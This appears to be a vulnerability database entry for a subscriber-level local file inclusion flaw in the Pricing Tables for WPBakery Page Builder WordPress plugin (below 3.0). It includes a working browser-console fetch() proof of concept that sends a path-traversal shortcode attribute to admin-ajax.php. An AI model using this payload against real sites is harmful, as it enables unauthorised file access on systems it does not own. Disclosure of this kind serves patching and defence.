Lucene search

K
wpexploitLana CodesWPEX-ID:267ACB2C-1A95-487F-A714-516DE05D2B2F
HistoryMar 22, 2023 - 12:00 a.m.

Pricing Tables For WPBakery Page Builder < 3.0 - Subscriber+ LFI

2023-03-2200:00:00
Lana Codes
48
pricing tables
developer console
web browser
ajax request
security exploit
subscriber role

EPSS

0.001

Percentile

29.8%

The plugin does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated users such as subscriber to perform LFI attacks

Run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[vca_pricing_plans_child vca_pp_styles='/../../../../index']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

EPSS

0.001

Percentile

29.8%

Related for WPEX-ID:267ACB2C-1A95-487F-A714-516DE05D2B2F